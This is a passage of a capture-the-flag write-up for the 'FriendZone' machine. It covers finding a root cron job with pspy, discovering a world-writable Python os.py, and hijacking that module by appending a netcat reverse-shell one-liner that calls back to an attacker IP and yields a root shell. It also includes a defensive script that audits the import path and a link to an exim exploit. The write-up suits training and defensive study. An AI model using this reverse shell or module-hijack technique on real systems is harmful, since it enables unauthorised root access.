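2020/10/10 13:57:56 CMD: UID=33 PID=1204 | ./pspy64
2020/10/10 13:58:01 CMD: UID=0 PID=1214 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 13:58:01 CMD: UID=0 PID=1213 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 13:58:01 CMD: UID=0 PID=1212 | /usr/sbin/CRON -f
2020/10/10 14:00:01 CMD: UID=0 PID=1217 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 14:00:01 CMD: UID=0 PID=1216 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:00:01 CMD: UID=0 PID=1215 | /usr/sbin/CRON -f
2020/10/10 14:02:01 CMD: UID=0 PID=1220 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:02:01 CMD: UID=0 PID=1218 | /usr/sbin/CRON -f
2020/10/10 14:05:16 CMD: UID=0 PID=1227 | /usr/sbin/exim4 -qG
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: UID=(?P<uid>\d+) PID=(?P<pid>\d+) \|\s?(?P<cmd>.*)$"
)


def parse_pspy(text):
    """Return (timestamp, uid, pid, cmd) per event line; kernel threads have an empty cmd."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y/%m/%d %H:%M:%S")
            events.append((ts, int(m.group("uid")), int(m.group("pid")), m.group("cmd").strip()))
    return events


def recurring_root_commands(events, min_runs=2):
    """Map job -> interval in seconds for UID-0 commands seen at a constant interval.

    The `/bin/sh -c` wrapper and the interpreter invocation appear as separate
    events for the same run, so both are normalised to the script path and
    de-duplicated per timestamp.
    """
    seen = defaultdict(list)
    for ts, uid, _, cmd in events:
        if uid != 0 or not cmd or cmd.startswith("/usr/sbin/CRON"):
            continue
        job = cmd
        if job.startswith("/bin/sh -c "):
            job = job[len("/bin/sh -c "):]
        elif job.startswith("/usr/bin/python "):
            job = job[len("/usr/bin/python "):]
        if ts not in seen[job]:
            seen[job].append(ts)
    found = {}
    for job, times in seen.items():
        if len(times) < min_runs:
            continue
        gaps = {int((b - a).total_seconds()) for a, b in zip(times, times[1:])}
        if len(gaps) == 1:  # one constant gap between runs means a scheduled job
            found[job] = gaps.pop()
    return found


if __name__ == "__main__":
    for job, interval in recurring_root_commands(parse_pspy(PSPY_LOG)).items():
        print("root job every %ds: %s" % (interval, job))
```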
friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
If we also run LinEnum, we find that /usr/lib/python2.7/os.py is writable by everyone:
...
[-] Files not owned by user but writable by group:
-rwxrw-rw- 1 nobody nogroup 46631 Oct 10 18:36 /etc/Development/LinEnum.sh
-rwxrw-rw- 1 nobody nogroup 5490 Oct 10 17:42 /etc/Development/shell.php
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
...
Because reporter.py imports os at the top and /usr/lib/python2.7/os.py is world-writable, I can append a reverse shell to the end of os.py; the next time the root cron job imports the module, it executes my reverse shell (module hijacking).
friend@FriendZone:~$ echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py
$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.123] 60540
/bin/sh: 0: can't access tty; job control turned off
#
#whoami
root
#cd /root
#cat root.txt
b0e6XXXXXXXXXXXXXXXXXXXXXXXXXXXX
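The defender-side check for this class of bug, as an added example (not part of the writeup): walk the interpreter's import path and flag any module file or directory that group or others can write, since anything a root cron job imports from such a location runs as root. The `demo()` function builds a constructed temporary tree with one 0777 os.py, mirroring the LinEnum finding above, to show what the audit reports.

```python
"""Audit the Python import path for module files another user could modify."""
import os
import stat
import sys
import tempfile


def group_or_world_writable(path):
    """True if the mode grants write to group or others (what LinEnum flagged)."""
    mode = os.lstat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_import_path(paths, max_depth=1):
    """Return [(path, mode_string)] for writable directories and .py files under each root.

    Directories matter as much as files: a writable directory lets a local
    user drop a new module that shadows a later one on the path.
    """
    findings = []
    for root in paths:
        if not root or not os.path.isdir(root):
            continue  # sys.path may contain '' and zip files; skip those
        root_depth = root.rstrip(os.sep).count(os.sep)
        for dirpath, dirnames, filenames in os.walk(root):
            if dirpath.count(os.sep) - root_depth >= max_depth:
                dirnames[:] = []  # do not descend further
            candidates = [dirpath] + [
                os.path.join(dirpath, f) for f in filenames if f.endswith(".py")
            ]
            for name in candidates:
                if group_or_world_writable(name):
                    findings.append((name, stat.filemode(os.lstat(name).st_mode)))
    return findings


def demo():
    """Constructed tree with one world-writable os.py; returns the flagged names."""
    base = tempfile.mkdtemp(prefix="pyaudit-")
    libdir = os.path.join(base, "python2.7")
    os.mkdir(libdir)
    os.chmod(libdir, 0o755)
    good = os.path.join(libdir, "string.py")
    bad = os.path.join(libdir, "os.py")
    for f in (good, bad):
        with open(f, "w") as fh:
            fh.write("# constructed stand-in module\n")
    os.chmod(good, 0o644)
    os.chmod(bad, 0o777)  # the -rwxrwxrwx mode LinEnum reported for os.py
    return [os.path.relpath(p, libdir) for p, _ in audit_import_path([libdir])]


if __name__ == "__main__":
    for path, mode in audit_import_path(sys.path):
        print("%s %s" % (mode, path))
    print("demo flags:", demo())
```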
As an alternative path, exim is also vulnerable to a local privilege escalation:
https://www.exploit-db.com/exploits/46996